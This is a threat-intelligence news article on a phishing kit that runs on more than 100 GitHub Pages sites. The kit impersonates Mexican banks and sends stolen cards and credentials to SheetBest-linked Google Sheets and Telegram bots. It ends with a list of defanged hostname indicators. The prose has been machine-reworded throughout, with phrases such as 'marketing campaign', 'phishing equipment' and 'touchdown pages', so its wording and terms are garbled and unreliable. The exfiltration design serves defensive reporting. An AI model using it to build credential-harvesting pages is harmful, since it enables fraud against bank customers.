A complicated, long-running phishing operation has developed right into a serverless, modular marketing campaign that weaponizes GitHub Pages to reap fee card information, credentials, and buyer identifiers from banking prospects in Mexico.
The marketing campaign’s structure facilities on a phishing equipment containing a selector panel that operators use to generate institution-specific touchdown pages.
These touchdown pages impersonate not less than a dozen monetary establishments, supporting each desktop and cellular interfaces to maximise sufferer engagement.
Slightly than counting on a single area, operators deployed the equipment throughout greater than 100 GitHub Pages repositories, every publishing cloned pages underneath diverse listing paths (for instance /cancelacion/, /soporte/, /mb1/) to extend redundancy, evade takedown, and allow speedy redeployment when particular person repositories are eliminated.
Group-IB researchers have attributed the marketing campaign persistence, scale, and operational self-discipline to a reusable phishing equipment that mixes distributed GitHub Pages internet hosting, obfuscated client-side scripts, and third-party APIs most notably SheetBest to exfiltrate stolen information.
Technically, the assault circulate is multi-stage. Victims are lured to a trust-building impersonation web page after which redirected to credential-harvesting kinds that mimic reputable banking login workflows.
Modular Phishing Equipment Makes use of GitHub Pages
The pages connect JavaScript submit listeners that decision e.preventDefault(), serialize kind subject values into JSON, and POST them to SheetBest API endpoints.
These requests populate attacker-controlled Google Sheets in actual time, eliminating the necessity to keep command-and-control servers.
Group-IB recognized a number of SheetBest endpoints related to the marketing campaign, all resolving to the identical backend IP, and noticed similar submission logic reused throughout a number of templates sturdy indicators of a centralized, serverless exfiltration backend supporting a many-to-one information assortment mannequin.
To complicate detection, phishing pages load obfuscated exterior JavaScript by randomized paths somewhat than embedding logic instantly in HTML.
Payload rotation is feasible with out altering the seen web page, undermining signature-based detection. Some cases additionally used hardcoded Telegram bot tokens and chat IDs to ahead stolen credentials in actual time, illustrating operational flexibility in exfiltration channels.
Repository metadata and commit histories reveal lively upkeep by a number of operator accounts over greater than a 12 months, with steady commits, template updates, and endpoint rotations.
Deployment leveraged Jekyll-based GitHub Pages builds and GitHub Actions for automation, and pages included Open Graph metadata to craft convincing hyperlink previews for messaging apps.
A robots noindex,nofollow directive confirmed these pages weren’t meant for natural discovery however for focused distribution through SMS, WhatsApp, Telegram, or social media, the place hyperlink previews can considerably improve click-through charges.
This marketing campaign underscores a maturing pattern: risk actors are abusing respected cloud platforms’ belief, HTTPS, and deployment ease to conduct resilient phishing at scale.
By exploiting companies like GitHub Pages and SheetBest, attackers scale back their infrastructure footprint and complicate attribution and takedown efforts.
For defenders, the implications are clear conventional blocklists and area blacklisting are inadequate.
Monetary establishments and safety groups should prioritize behavioral detections, steady monitoring for model impersonation throughout developer and internet hosting platforms, speedy takedown coordination with service suppliers, and sector-wide intelligence sharing.
Indicators of Compromise (IOCs)
| # | Hostname | Rely |
|---|---|---|
| 1 | soporte-index25.github[.]io | 2 |
| 2 | soporte-index09.github[.]io | 2 |
| 3 | sntdr-soporte25.github[.]io | 1 |
| 4 | sntdr-soporte25.github[.]io | 1 |
| 5 | 07-soporte.github[.]io | 2 |
| 6 | soporte2507.github[.]io | 2 |
| 7 | soporte160625.github[.]io | 3 |
| 8 | soporte250324.github[.]io | 2 |
| 9 | soporte74.github[.]io | 4 |
| 10 | soporte-bm1.github[.]io | 1 |
| 11 | soporte-r5.github[.]io | 3 |
| 12 | api.sheetbest.com | 2 |
| 13 | soporte0625.github[.]io | 2 |
| 14 | soporte200525.github[.]io | 2 |
| 15 | soporte2650.github[.]io | 1 |
| 16 | soporte-bn1.github[.]io | 1 |
| 17 | soporte-b2.github[.]io | 1 |
| 18 | soporte-index.github[.]io | 2 |
| 19 | soporte-c1.github[.]io | 1 |
| 20 | soporte-b4.github[.]io | 1 |
| 21 | sntndr25-soporte.github[.]io | 2 |
| 22 | sntndr-soporte0825.github[.]io | 2 |
| 23 | 0825-soporte.github[.]io | 2 |
| 24 | soporte-07-25.github[.]io | 2 |
| 25 | soporte-0725.github[.]io | 2 |
| 26 | 0725soporte.github[.]io | 2 |
| 27 | soporte0725-3.github[.]io | 2 |
| 28 | soporte0725.github[.]io | 2 |
| 29 | soporteyatencionf.github[.]io | 2 |
| 30 | 0725-soporte.github[.]io | 2 |
| 31 | soporte-y-atencion.github[.]io | 1 |
| 32 | soporter03.github[.]io | 1 |
| 33 | respaldo94.github[.]io | 2 |
| 34 | soporte-index05.github[.]io | 1 |
| 35 | soporte-b1.github[.]io | 1 |
| 36 | soporte0625.github[.]io | 2 |
| 37 | soporte250324.github[.]io | 2 |
| 38 | fldsmdfr-94.github[.]io | 2 |
| 39 | support-vh.github[.]io | 1 |
Observe: IP addresses and domains are deliberately defanged (e.g., [.]) to forestall unintended decision or hyperlinking. Re-fang solely inside managed risk intelligence platforms resembling MISP, VirusTotal, or your SIEM.
Observe us on Google Information, LinkedIn, and X to Get On the spot Updates and Set GBH as a Most well-liked Supply in Google.
![How creators and entrepreneurs are utilizing AI to hurry up & succeed [data]](https://blog.aimactgrow.com/wp-content/uploads/2025/06/Untitled20design-Apr-07-2023-08-24-35-4586-PM-120x86.png)
